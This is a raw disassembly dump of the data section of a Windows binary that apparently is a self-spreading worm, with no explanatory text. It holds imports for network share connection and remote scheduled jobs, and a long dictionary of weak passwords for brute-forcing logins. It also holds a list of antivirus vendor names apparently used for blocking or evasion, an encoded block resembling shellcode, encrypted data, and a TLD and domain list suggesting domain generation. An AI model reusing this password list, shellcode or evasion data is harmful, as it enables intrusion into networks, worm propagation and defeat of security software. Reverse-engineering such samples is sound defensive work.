; [00000006 BYTES: COLLAPSED FUNCTION strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION log. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION sin. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION labs. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000021 BYTES: COLLAPSED FUNCTION __allshr. PRESS KEYPAD "+" TO EXPAND]
; [000000AB BYTES: COLLAPSED FUNCTION _CRT_INIT(x,x,x). PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
align 2
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Module32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Module32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Process32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ntohl_0. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION inet_addr. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION __WSAFDIsSet. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ntohl. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NdrClientCall2. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ObtainUserAgentString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetCancelConnection2W. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetAddConnection2W. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetAddConnection2A. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WNetCancelConnection2A. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION VerQueryValueA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileVersionInfoA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileVersionInfoSizeA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetApiBufferFree. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetScheduleJobDel. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetScheduleJobEnum. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetScheduleJobAdd. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetUserEnum. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetServerEnum. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION NetWkstaGetInfo. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
dd 727h dup(0)
dword_9B9000 dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+4F�o
dword_9B9004 dd 3 dup(0) ; DATA XREF: _CRT_INIT(x,x,x)+4A�o
off_9B9010 dd offset Password ; DATA XREF: sub_9A870C+130�r
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a123123 ; "123123"
dd offset a12321 ; "12321"
dd offset a123321 ; "123321"
dd offset a123abc ; "123abc"
dd offset a123qwe ; "123qwe"
dd offset a123asd ; "123asd"
dd offset a1234abcd ; "1234abcd"
dd offset a1234qwer ; "1234qwer"
dd offset a1q2w3e ; "1q2w3e"
dd offset aA1b2c3 ; "a1b2c3"
dd offset aAdmin_0 ; "admin"
dd offset aAdmin ; "Admin"
dd offset aAdministrator ; "administrator"
dd offset aNimda ; "nimda"
dd offset aQwewq ; "qwewq"
dd offset aQweewq ; "qweewq"
dd offset aQwerty ; "qwerty"
dd offset aQweasd ; "qweasd"
dd offset aAsdsa ; "asdsa"
dd offset aAsddsa ; "asddsa"
dd offset aAsdzxc ; "asdzxc"
dd offset aAsdfgh ; "asdfgh"
dd offset aQweasdzxc ; "qweasdzxc"
dd offset aQ1w2e3 ; "q1w2e3"
dd offset aQazwsx ; "qazwsx"
dd offset aQazwsxedc ; "qazwsxedc"
dd offset aZxcxz ; "zxcxz"
dd offset aZxccxz ; "zxccxz"
dd offset aZxcvb ; "zxcvb"
dd offset aZxcvbn ; "zxcvbn"
dd offset aPasswd ; "passwd"
dd offset aPassword_0 ; "password"
dd offset aPassword ; "Password"
dd offset aLogin_0 ; "login"
dd offset aLogin ; "Login"
dd offset aPass ; "pass"
dd offset aMypass ; "mypass"
dd offset aMypassword ; "mypassword"
dd offset aAdminadmin ; "adminadmin"
dd offset aRoot ; "root"
dd offset aRootroot ; "rootroot"
dd offset aTest ; "test"
dd offset aTesttest ; "testtest"
dd offset aTemp ; "temp"
dd offset aTemptemp ; "temptemp"
dd offset aFoofoo ; "foofoo"
dd offset aFoobar ; "foobar"
dd offset aDefault ; "default"
dd offset aPassword1 ; "password1"
dd offset aPassword12 ; "password12"
dd offset aPassword123 ; "password123"
dd offset aAdmin1 ; "admin1"
dd offset aAdmin12 ; "admin12"
dd offset aAdmin123 ; "admin123"
dd offset aPass1 ; "pass1"
dd offset aPass12 ; "pass12"
dd offset aPass123 ; "pass123"
dd offset aRoot123 ; "root123"
dd offset aPw123 ; "pw123"
dd offset aAbc123 ; "abc123"
dd offset aQwe123 ; "qwe123"
dd offset aTest123 ; "test123"
dd offset aTemp123 ; "temp123"
dd offset aMypc123 ; "mypc123"
dd offset aHome123 ; "home123"
dd offset aWork123 ; "work123"
dd offset aBoss123 ; "boss123"
dd offset aLove123 ; "love123"
dd offset aSample ; "sample"
dd offset aExample ; "example"
dd offset aInternet_0 ; "internet"
dd offset aInternet ; "Internet"
dd offset aNopass ; "nopass"
dd offset aNopassword ; "nopassword"
dd offset aNothing ; "nothing"
dd offset aIhavenopass ; "ihavenopass"
dd offset aTemporary ; "temporary"
dd offset aManager ; "manager"
dd offset aBusiness ; "business"
dd offset aOracle ; "oracle"
dd offset aLotus ; "lotus"
dd offset aDatabase ; "database"
dd offset aBackup ; "backup"
dd offset aOwner ; "owner"
dd offset aComputer ; "computer"
dd offset aServer ; "server"
dd offset aSecret ; "secret"
dd offset aSuper ; "super"
dd offset aShare ; "share"
dd offset aSuperuser ; "superuser"
dd offset aSupervisor ; "supervisor"
dd offset aOffice ; "office"
dd offset aShadow ; "shadow"
dd offset aSystem ; "system"
dd offset aPublic ; "public"
dd offset aSecure ; "secure"
dd offset aSecurity ; "security"
dd offset aDesktop ; "desktop"
dd offset aChangeme ; "changeme"
dd offset aCodename ; "codename"
dd offset aCodeword ; "codeword"
dd offset aNobody ; "nobody"
dd offset aCluster ; "cluster"
dd offset aCustomer ; "customer"
dd offset aExchange ; "exchange"
dd offset aExplorer ; "explorer"
dd offset aCampus ; "campus"
dd offset aMoney ; "money"
dd offset aAccess ; "access"
dd offset aDomain ; "domain"
dd offset aLetmein ; "letmein"
dd offset aLetitbe ; "letitbe"
dd offset aAnything ; "anything"
dd offset aUnknown ; "unknown"
dd offset aMonitor ; "monitor"
dd offset aWindows ; "windows"
dd offset aFiles ; "files"
dd offset aAcademia ; "academia"
dd offset aAccount ; "account"
dd offset aStudent ; "student"
dd offset aFreedom ; "freedom"
dd offset aForever ; "forever"
dd offset aCookie ; "cookie"
dd offset aCoffee ; "coffee"
dd offset aMarket ; "market"
dd offset aPrivate ; "private"
dd offset aGames ; "games"
dd offset aKiller ; "killer"
dd offset aController ; "controller"
dd offset aIntranet ; "intranet"
dd offset aWork ; "work"
dd offset aHome ; "home"
dd offset aJob ; "job"
dd offset aFoo ; "foo"
dd offset aWeb ; "web"
dd offset aFile ; "file"
dd offset aSql ; "sql"
dd offset aAaa_0 ; "aaa"
dd offset aAaaa ; "aaaa"
dd offset aAaaaa ; "aaaaa"
dd offset aQqq ; "qqq"
dd offset aQqqq ; "qqqq"
dd offset aQqqqq ; "qqqqq"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aZzz ; "zzz"
dd offset aZzzz ; "zzzz"
dd offset aZzzzz ; "zzzzz"
dd offset aFuck ; "fuck"
dd offset a12 ; "12"
dd offset a21 ; "21"
dd offset a321 ; "321"
dd offset a4321 ; "4321"
dd offset a54321 ; "54321"
dd offset a654321 ; "654321"
dd offset a7654321 ; "7654321"
dd offset a87654321 ; "87654321"
dd offset a987654321 ; "987654321"
dd offset a0987654321 ; "0987654321"
dd offset PrefixString ; "0"
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a00000 ; "00000"
dd offset a0000000 ; "0000000"
dd offset a00000000 ; "00000000"
dd offset a1 ; "1"
dd offset a11 ; "11"
dd offset a111 ; "111"
dd offset a1111 ; "1111"
dd offset a11111 ; "11111"
dd offset a111111 ; "111111"
dd offset a1111111 ; "1111111"
dd offset a11111111 ; "11111111"
dd offset a2_0 ; "2"
dd offset a22 ; "22"
dd offset a222 ; "222"
dd offset a2222 ; "2222"
dd offset a22222 ; "22222"
dd offset a222222 ; "222222"
dd offset a2222222 ; "2222222"
dd offset a22222222 ; "22222222"
dd offset a3 ; "3"
dd offset a33 ; "33"
dd offset a333 ; "333"
dd offset a3333 ; "3333"
dd offset a33333 ; "33333"
dd offset a333333 ; "333333"
dd offset a3333333 ; "3333333"
dd offset a33333333 ; "33333333"
dd offset a4 ; "4"
dd offset a44 ; "44"
dd offset a444 ; "444"
dd offset a4444 ; "4444"
dd offset a44444 ; "44444"
dd offset a444444 ; "444444"
dd offset a4444444 ; "4444444"
dd offset a44444444 ; "44444444"
dd offset a5 ; "5"
dd offset a55 ; "55"
dd offset a555 ; "555"
dd offset a5555 ; "5555"
dd offset a55555 ; "55555"
dd offset a555555 ; "555555"
dd offset a5555555 ; "5555555"
dd offset a55555555 ; "55555555"
dd offset a6 ; "6"
dd offset a66 ; "66"
dd offset a666 ; "666"
dd offset a6666 ; "6666"
dd offset a66666 ; "66666"
dd offset a666666 ; "666666"
dd offset a6666666 ; "6666666"
dd offset a66666666 ; "66666666"
dd offset a7 ; "7"
dd offset a77 ; "77"
dd offset a777 ; "777"
dd offset a7777 ; "7777"
dd offset a77777 ; "77777"
dd offset a777777 ; "777777"
dd offset a7777777 ; "7777777"
dd offset a77777777 ; "77777777"
dd offset a8 ; "8"
dd offset a88 ; "88"
dd offset a888 ; "888"
dd offset a8888 ; "8888"
dd offset a88888 ; "88888"
dd offset a888888 ; "888888"
dd offset a8888888 ; "8888888"
dd offset a88888888 ; "88888888"
dd offset a9 ; "9"
dd offset a99 ; "99"
dd offset a999 ; "999"
dd offset a9999 ; "9999"
dd offset a99999 ; "99999"
dd offset a999999 ; "999999"
dd offset a9999999 ; "9999999"
dd offset dword_9A2718+4
align 8
off_9B93F8 dd offset aVirus ; DATA XREF: sub_9A8D37:loc_9A8D54�r
; "virus"
dd offset aSpyware ; "spyware"
dd offset aMalware ; "malware"
dd offset aRootkit ; "rootkit"
dd offset aDefender ; "defender"
dd offset aMicrosoft ; "microsoft"
dd offset aSymantec ; "symantec"
dd offset aNorton ; "norton"
dd offset aMcafee ; "mcafee"
dd offset aTrendmicro ; "trendmicro"
dd offset aSophos ; "sophos"
dd offset aPanda ; "panda"
dd offset aEtrust ; "etrust"
dd offset aNetworkassocia ; "networkassociates"
dd offset aComputerassoci ; "computerassociates"
dd offset aFSecure ; "f-secure"
dd offset aKaspersky ; "kaspersky"
dd offset aJotti ; "jotti"
dd offset aFProt ; "f-prot"
dd offset aNod32 ; "nod32"
dd offset aEset ; "eset"
dd offset aGrisoft ; "grisoft"
dd offset aDrweb ; "drweb"
dd offset aCentralcommand ; "centralcommand"
dd offset aAhnlab ; "ahnlab"
dd offset aEsafe ; "esafe"
dd offset aAvast ; "avast"
dd offset aAvira ; "avira"
dd offset aQuickheal ; "quickheal"
dd offset aComodo ; "comodo"
dd offset aClamav ; "clamav"
dd offset aEwido ; "ewido"
dd offset aFortinet ; "fortinet"
dd offset aGdata ; "gdata"
dd offset aHacksoft ; "hacksoft"
dd offset aHauri ; "hauri"
dd offset aIkarus ; "ikarus"
dd offset aK7computing ; "k7computing"
dd offset aNorman ; "norman"
dd offset aPctools ; "pctools"
dd offset aPrevx ; "prevx"
dd offset aRising ; "rising"
dd offset aSecurecomputin ; "securecomputing"
dd offset aSunbelt ; "sunbelt"
dd offset aEmsisoft ; "emsisoft"
dd offset aArcabit ; "arcabit"
dd offset aCpsecure ; "cpsecure"
dd offset aSpamhaus ; "spamhaus"
dd offset aCastlecops ; "castlecops"
dd offset aThreatexpert ; "threatexpert"
dd offset aWilderssecurit ; "wilderssecurity"
dd offset aWindowsupdate ; "windowsupdate"
off_9B94C8 dd offset dword_9A3C6C ; DATA XREF: sub_9A8D37:loc_9A8D82�o
dd offset dword_9A3C68
dd offset dword_9A3C60
dd offset dword_9A3C58
dd offset dword_9A345C+7F4h
dd offset dword_9A345C+7ECh
dd offset dword_9A345C+7E4h
dd offset dword_9A345C+7DCh
off_9B94E8 dd offset aHttpCheckip_dy ; DATA XREF: sub_9A9580+58�r
; "http://checkip.dyndns.org"
dd offset aHttpWww_whatis ; "http://www.whatismyip.org"
dd offset aHttpWww_whatsm ; "http://www.whatsmyipaddress.com"
dd offset aHttpWww_getmyi ; "http://www.getmyip.org"
dword_9B94F8 dd 0 ; DATA XREF: sub_9A98F7+4A�r
; sub_9A98F7:loc_9A9960�r
dword_9B94FC dd 9, 1F1CB0h, 3 dup(0) ; DATA XREF: sub_9A98F7+52�r
; sub_9A98F7+71�r
dd 5, 9, 780E1FCBh, 3 dup(0)
dd 6, 9, 7C90568Ch, 7CA27CF4h, 7C86FED3h, 7C83E413h, 7
dd 9, 7C86BEB8h, 7CA1E84Eh, 7C86A01Bh, 7C83F517h, 2, 9
dd 7801CB24h, 3 dup(0)
dd 3, 9, 6F88F727h, 6F8916E2h, 2 dup(0)
dd 3, 1, 6FD8F727h, 6FD916E2h, 2 dup(0)
dd 3, 416h, 596FF727h, 597016E2h, 2 dup(0)
dd 3, 804h, 58FBF727h, 58FC16E2h, 2 dup(0)
dd 3, 4, 5860F727h, 586116E2h, 2 dup(0)
dd 3, 5, 6FE1F727h, 6FE216E2h, 2 dup(0)
dd 3, 6, 5978F727h, 597916E2h, 2 dup(0)
dd 3, 13h, 596CF727h, 596D16E2h, 2 dup(0)
dd 3, 0Bh, 597DF727h, 597E16E2h, 2 dup(0)
dd 3, 0Ch, 595BF727h, 595C16E2h, 2 dup(0)
dd 3, 7, 6FD9F727h, 6FDA16E2h, 2 dup(0)
dd 3, 8, 592AF727h, 592B16E2h, 2 dup(0)
dd 3, 0Eh, 5970F727h, 597116E2h, 2 dup(0)
dd 3, 0Dh, 5940F727h, 594116E2h, 2 dup(0)
dd 3, 10h, 596BF727h, 596C16E2h, 2 dup(0)
dd 3, 11h, 567FF727h, 568016E2h, 2 dup(0)
dd 3, 12h, 6FD6F727h, 6FD716E2h, 2 dup(0)
dd 3, 14h, 597CF727h, 597D16E2h, 2 dup(0)
dd 3, 15h, 5941F727h, 594216E2h, 2 dup(0)
dd 3, 16h, 596BF727h, 596C16E2h, 2 dup(0)
dd 3, 19h, 6FE1F727h, 6FE216E2h, 2 dup(0)
dd 3, 0Ah, 6FDBF727h, 6FDC16E2h, 2 dup(0)
dd 3, 1Dh, 597AF727h, 597B16E2h, 2 dup(0)
dd 3, 1Fh, 5A78F727h, 5A7916E2h, 2 dup(0)
dd 4, 9, 6F88F807h, 6F8917C2h, 2 dup(0)
dd 4, 1, 6FD8F807h, 6FD917C2h, 2 dup(0)
dd 4, 416h, 596FF807h, 597017C2h, 2 dup(0)
dd 4, 804h, 58FBF807h, 58FC17C2h, 2 dup(0)
dd 2 dup(4), 5860F807h, 586117C2h, 2 dup(0)
dd 4, 5, 6FE1F807h, 6FE217C2h, 2 dup(0)
dd 4, 6, 5978F807h, 597917C2h, 2 dup(0)
dd 4, 13h, 596CF807h, 596D17C2h, 2 dup(0)
dd 4, 0Bh, 597DF807h, 597E17C2h, 2 dup(0)
dd 4, 0Ch, 595BF807h, 595C17C2h, 2 dup(0)
dd 4, 7, 6FD9F807h, 6FDA17C2h, 2 dup(0)
dd 4, 8, 592AF807h, 592B17C2h, 2 dup(0)
dd 4, 0Eh, 5970F807h, 597117C2h, 2 dup(0)
dd 4, 0Dh, 5940F807h, 594117C2h, 2 dup(0)
dd 4, 10h, 596BF807h, 596C17C2h, 2 dup(0)
dd 4, 11h, 567FF807h, 568017C2h, 2 dup(0)
dd 4, 12h, 6FD6F807h, 6FD717C2h, 2 dup(0)
dd 4, 14h, 597CF807h, 597D17C2h, 2 dup(0)
dd 4, 15h, 5941F807h, 594217C2h, 2 dup(0)
dd 4, 16h, 596BF807h, 596C17C2h, 2 dup(0)
dd 4, 19h, 6FE1F807h, 6FE217C2h, 2 dup(0)
dd 4, 0Ah, 6FDBF807h, 6FDC17C2h, 2 dup(0)
dd 4, 1Dh, 597AF807h, 597B17C2h, 2 dup(0)
dd 4, 1Fh, 5A78F807h, 5A7917C2h, 2 dup(0)
dword_9B99F0 dd 0FFFFFFE8h, 8D5FC2FFh, 3180104Fh, 816641C4h, 75534D39h
; DATA XREF: sub_9A9654+71�o
dd 26AFCF5h, 418B6459h, 0C408B2Eh, 8B1C408Bh, 8588B00h
dd 0A1B78Dh, 29E80000h, 50000000h, 0FC8BF8E2h, 9317FF56h
dd 0E807C683h, 18h, 5252D233h, 0C766CC8Bh, 512E7801h, 520477FFh
dd 52565152h, 0E0FF37FFh, 955651ADh, 8B3C4B8Bh, 3780B4Ch
dd 8DF633CBh, 5103B314h, 3128B20h, 0C0000FD3h, 0C1C0BF0Fh
dd 23207C0h, 3A8042h, 0C53BF575h, 3B460674h, 0DB721871h
dd 324518Bh, 14B70FD3h, 1C418B72h, 48BC303h, 5EC30390h
dd 0A260C359h, 8026768Ah, 7275C8ACh, 6E6F6D6Ch, 5D239900h
dd 0D9h
; DWORD dwMilliseconds
dwMilliseconds dd 3E8h ; DATA XREF: sub_9AC5BB:loc_9AC69B�r
; sub_9AC789+C1�r ...
; volatile LONG dword_9B9AB0
dword_9B9AB0 dd 64h ; DATA XREF: sub_9AC789+C8�r
; sub_9ACA50+11�o
off_9B9AB4 dd offset dword_9A44AC ; DATA XREF: sub_9AC476+19�r
dd offset dword_9A44A4
dd offset dword_9A4498
dd offset dword_9A4490
dd offset dword_9A4484
; wchar_t *off_9B9AC8
off_9B9AC8 dd offset aBoot ; DATA XREF: sub_9AD71D+89�r
; sub_9AD71D+AB�r
; "Boot"
dd offset aCenter ; "Center"
dd offset aConfig ; "Config"
dd offset aDriver ; "Driver"
dd offset aHelper ; "Helper"
dd offset aImage ; "Image"
dd offset aInstaller ; "Installer"
dd offset aManager_0 ; "Manager"
dd offset aMicrosoft_0 ; "Microsoft"
dd offset aMonitor_0 ; "Monitor"
dd offset aNetwork ; "Network"
dd offset aSecurity_0 ; "Security"
dd offset aServer_0 ; "Server"
dd offset aShell ; "Shell"
dd offset aSupport ; "Support"
dd offset aSystem_0 ; "System"
dd offset aTask ; "Task"
dd offset aTime ; "Time"
dd offset aUniversal ; "Universal"
dd offset aUpdate ; "Update"
dd offset aWindows_0 ; "Windows"
align 10h
; int dword_9B9B20
dword_9B9B20 dd 0C351h ; DATA XREF: sub_9AD914+1F�r
align 8
dword_9B9B28 dd 0F52DA7E7h, 4912CA45h, 0D61E44E6h, 0BA1B4C72h, 8BF0723Ch
; DATA XREF: sub_9AD914+25�o
dd 0F375EB4Bh, 0CD44E85Eh, 21E95687h, 333406E6h, 42934976h
dd 3603E8ECh, 4DADA619h, 967F5912h, 25418501h, 7E83E2CBh
dd 0B385DF72h, 0FB59E1DDh, 2D9A7897h, 0E93DB6B2h, 39455258h
dd 9FC8901Bh, 422B5CD7h, 0D86AA6DEh, 4CF2D003h, 2E2472AFh
dd 4DF38C9Dh, 0F24D2F2Fh, 2989D649h, 0FFC6C9A2h, 0B6985FF2h
dd 92AD0968h, 10D57010h, 0B6DA1CEAh, 0CC03D4BCh, 578E9E8Dh
dd 0BCFCCF8Ch, 319EC35Bh, 8A08DA5Bh, 0BF802693h, 8045DBD2h
dd 0AF873383h, 5FF6C269h, 14349915h, 0CC880FCBh, 93E92944h
dd 0F97E9E45h, 938A8712h, 0BB43338Eh, 605B400Ch, 3140864Ch
dd 13659917h, 8AC26CE4h, 0D930A4E5h, 0BB6AD6F3h, 2DADFEBh
dd 7E386DECh, 6811EE23h, 0A87D628Ah, 0C69E9393h, 23F17BDCh
dd 3972665Dh, 56E53DC8h, 0A8D920C3h, 0E435259Ah, 7ED4993Bh
dd 74D7D161h, 0EB6AE350h, 3D315A49h, 4A29DE21h, 0D1FC30CDh
dd 7398D7FDh, 53A64B60h, 0EEF95D08h, 9721E605h, 0D6B7D9EDh
dd 0B13400BCh, 26BD6B76h, 1C2C8A60h, 2D58E6B6h, 9404D47h
dd 9DB1835Bh, 0A28E983Ch, 7A5D9E2Dh, 0C80DF107h, 0B047261Bh
dd 8701C1Ah, 9CC24C76h, 0EF33ACFh, 0A800C61Eh, 9247CB15h
dd 7F91D7Eh, 4992AA42h, 0ED7104DCh, 0E6DCE7D6h, 25BD3CADh
dd 0ECFA3218h, 0FBA5B7FAh, 5249A1CCh, 0A76030BAh, 95A3B0D3h
dd 61DAF2E5h, 97D227BDh, 3366D8C0h, 0D2130437h, 0CB3F9D36h
dd 2E6B7924h, 0BE12269h, 485BC1ADh, 0D5E18Ah, 6443787h
dd 744CAEF5h, 0A30F204Bh, 0D4086357h, 3AF0EB57h, 0C4031AE3h
dd 2D179ADFh, 441FFD7Fh, 0B749DA71h, 0B5263FBAh, 0CAFE9CDDh
dd 0ECDB7018h, 96846399h, 4C801030h, 0BC4D7333h, 2C79C3B2h
dd 41CD6883h, 7DED455Ch, 88A8BEE7h
off_9B9D28 dd offset aBaidu_com ; DATA XREF: sub_9ADB52+25�r
; "baidu.com"
dd offset aGoogle_com ; "google.com"
dd offset aYahoo_com ; "yahoo.com"
dd offset dword_9A4490
dd offset aAsk_com ; "ask.com"
dd offset aW3_org ; "w3.org"
; char *off_9B9D40
off_9B9D40 dd offset aJan ; DATA XREF: sub_9ADA6E+84�r
; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
; char *off_9B9D70
off_9B9D70 dd offset a_cc ; DATA XREF: sub_9ADD9B+C3�r
; ".cc"
dd offset a_cn ; ".cn"
dd offset a_ws ; ".ws"
dd offset a_com ; ".com"
dd offset a_net ; ".net"
dd offset a_org ; ".org"
dd offset a_info ; ".info"
dd offset a_biz ; ".biz"
dbl_9B9D90 db 56h, 48h, 85h, 56h, 77h, 0, 0, 0 ; DATA XREF: sub_9ADB52+C1�w
; sub_9ADC21+C�r ...
off_9B9D98 dd offset dword_9A4AE4 ; DATA XREF: sub_9AE6A2+238�r
dd offset dword_9A4AE0
dd offset aJpeg ; "jpeg"
dd offset dword_9A4AD4
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 9A4BA8h
byte_9B9DC0 db 6 ; DATA XREF: sub_9B392F+33�r
; sub_9B392F+4C�r ...
db 3 dup(46h)
dd 45452929h, 46464609h, 29292946h, 1292929h, 5101101h
dd 45464646h, 40200000h, 6060202h, 666606h
byte_9B9DE8 db 4 ; DATA XREF: sub_9B2B17+418�r
db 4, 2 dup(6)
dd 7070000h, 2 dup(404h)
dword_9B9DF8 dd 1 ; DATA XREF: sub_9B6513�r
; sub_9B6665+39�w
dword_9B9DFC dd 19930520h, 4 dup(0) ; DATA XREF: .text:009B6EDF�o
; __NLG_Notify+2�o
; HANDLE hObject
hObject dd 0E4h ; DATA XREF: sub_9A799E+EB�w
; sub_9A799E+12F�r
; char aMarnwkcw[]
aMarnwkcw db 'marnwkcw',0 ; DATA XREF: sub_9A799E+A9�o
; sub_9A799E:loc_9A7B20�o ...
align 10h
dword_9B9E20 dd 0 ; DATA XREF: sub_9A7170+AF�w
; sub_9ACABE+1C�r ...
align 8
; char ExistingFileName[]
ExistingFileName db 'c:\windows\system32\oc.dll',0 ; DATA XREF: sub_9A722A+2B�o
; sub_9A7410+5C�o ...
align 4
dd 39h dup(0)
db 3 dup(0)
byte_9B9F2B db 0 ; DATA XREF: sub_9A752A+121�w
; sub_9A799E+49�w
; DWORD nNumberOfBytesToWrite
nNumberOfBytesToWrite dd 0 ; DATA XREF: StartAddress+89�o
; StartAddress+B7�r ...
; LPCVOID lpBuffer
lpBuffer dd 0 ; DATA XREF: StartAddress+97�w
; sub_9A8326+1AE�r ...
dword_9B9F34 dd 0CA3F246h ; DATA XREF: sub_9A752A+9�r
; sub_9A799E+88�w ...
; volatile LONG dword_9B9F38
dword_9B9F38 dd 0 ; DATA XREF: StartAddress:loc_9A77E2�o
; sub_9ADCF2+9�r ...
align 10h
; wchar_t word_9B9F40
word_9B9F40 dw 0 ; DATA XREF: sub_9A88A6+5D�o
; sub_9A8949+32�o ...
align 4
dd 80h dup(0)
db 2 dup(0)
word_9BA146 dw 0 ; DATA XREF: sub_9A8949+40�w
dword_9BA148 dd 0 ; DATA XREF: fn+20�w sub_9A8A37�w ...
; LPVOID lpAddress
lpAddress dd 0 ; DATA XREF: sub_9A9D72+3�r
; sub_9A9D72+19�r ...
dword_9BA150 dd 7FFA0000h ; DATA XREF: sub_9A9DD2+3�r sub_9AA49F�o
dword_9BA154 dd 0 ; DATA XREF: sub_9A9E5D+3�r
; sub_9A9E5D+19�r ...
dword_9BA158 dd 0 ; DATA XREF: sub_9A9F18+3�r
; sub_9A9F18+19�r ...
dword_9BA15C dd 0 ; DATA XREF: sub_9A9FAE+3�r
; sub_9A9FAE+19�r ...
dword_9BA160 dd 0 ; DATA XREF: .text:loc_9AA04F�r
; .text:009AA065�r ...
dword_9BA164 dd 0 ; DATA XREF: sub_9AA29B:loc_9AA2C3�r
; sub_9AA53A:loc_9AA54F�o
dword_9BA168 dd 0 ; DATA XREF: sub_9AA29B+9�r
; sub_9AA53A+D�w
align 10h
; char Buffer[]
Buffer db 100h dup(0) ; DATA XREF: sub_9AA85A+1CE�o
; sub_9AB2C3+16�o
dword_9BA270 dd 0 ; DATA XREF: sub_9AC5BB+1A�r
; sub_9AC789+1D�r ...
; volatile LONG Addend
Addend dd 0 ; DATA XREF: sub_9AC5BB+F�o
; sub_9AC5BB:loc_9AC6E9�o ...
; volatile LONG dword_9BA278
dword_9BA278 dd 0 ; DATA XREF: sub_9AC911+13�r
; sub_9ACABE+D9�r ...
dword_9BA27C dd 0 ; DATA XREF: sub_9AC911+1B�r
; sub_9ACABE+1D1�w ...
; volatile LONG dword_9BA280
dword_9BA280 dd 0 ; DATA XREF: sub_9AC789+110�o
; sub_9AC911+D7�o ...
; volatile LONG Target
Target dd 0 ; DATA XREF: sub_9AC6FE+3C�o
; sub_9AC911+E2�r
; volatile LONG dword_9BA288
dword_9BA288 dd 0 ; DATA XREF: sub_9ADCF2+3C�o
; sub_9ADD9B+53�w ...
dword_9BA28C dd 3 dup(0) ; DATA XREF: sub_9A9654+D�o
; sub_9AE6A2+70�o ...
dword_9BA298 dd 3 dup(0) ; DATA XREF: sub_9AE6A2+96�o
; sub_9AEAF7+52�o ...
; volatile LONG dword_9BA2A4
dword_9BA2A4 dd 0 ; DATA XREF: sub_9AC911:loc_9AC933�r
; sub_9ACABE+17C�r ...
dword_9BA2A8 dd 0 ; DATA XREF: sub_9AEA12+63�r
; sub_9AEA12+70�w
; size_t dword_9BA2AC
dword_9BA2AC dd 0 ; DATA XREF: sub_9AEEBC+77�r
; sub_9AEFDD+8E�w
